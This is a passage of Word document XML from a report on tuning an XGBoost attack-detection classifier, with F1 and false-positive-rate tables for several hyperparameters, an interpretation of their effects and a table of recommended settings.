              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0993</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0944</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`learning_rate`</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0.01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.6848</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1412</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1163</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7329</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0993</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7184</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0927</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`scale_pos_weight`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1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7333</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0490</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7313</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0787</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7329</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0993</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7149</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 is effectively saturated.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Setting aside the deliberately crippled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate=0.01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> point (0.6848), every other XGBoost configuration lands in a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">narrow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~0.71–0.735</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> band. The best-observed setting, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth=12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(F1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.7354</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, FPR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0796</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), beats the default by only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~0.003</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F1. This is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the signature of a model whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ranking quality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is already dominated by the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>feature representation rather than by ensemble capacity — more trees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t>), deeper trees (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_depth</w:t>
      </w:r>
      <w:r>
        <w:t>), or a hotter step size buys almost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>nothing once you clear the obvious underfitting cliff. In practical terms,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XGBoost is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>robust / insensitive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on F1: you cannot easily break it, and you</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cannot easily improve it either.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two curves do show a coherent underfitting→plateau shape and explain why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the largest F1 mover here: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.6848 → 0.7329,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">swing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0481</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and, to a lesser degree, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.7083 → 0.7329,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">swing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0246</w:t>
      </w:r>
      <w:r>
        <w:t>). Both bottom out when the ensemble is starved of gradient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>steps and flatten — even regress slightly (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 0.7249;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>learning_rate=0.30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 0.7184) — once capacity is adequate, the classic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>mild-overfitting rollover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`scale_pos_weight` is the false-alarm knob, not an F1 knob.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Its F1 column is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the flattest in the entire XGBoost study — a total swing of just </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.0184</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(0.7149 → 0.7333) — yet it owns the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>largest FPR swing of any parameter</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.049 → 0.1447</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>~3×</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inflation in false alarms. This is exactly the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>parameter's design purpose. In a 1:3 attack:benign setting the positive (attack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">class is the minority; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> up-weights positives to trade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>precision for recall. Cranking it up manufactures more attack predictions —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">more true positives </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proportionally many more false positives — which is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>why FPR climbs monotonically while F1, a precision/recall blend, stays pinned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The corollary matters operationally: the model's operating point on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">false-alarm axis is chosen almost entirely by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight</w:t>
      </w:r>
      <w:r>
        <w:t>, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>default of **3.0 triples the FPR (0.0490 → 0.0993) relative to 1.0 for no F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>benefit** (0.7333 → 0.7329).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Recommended settings — XGBoost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recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>learning_rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Peak F1 (0.7329); both 0.05 and 0.30 are strictly worse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Peak F1; 400 slightly overfits (0.7249).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
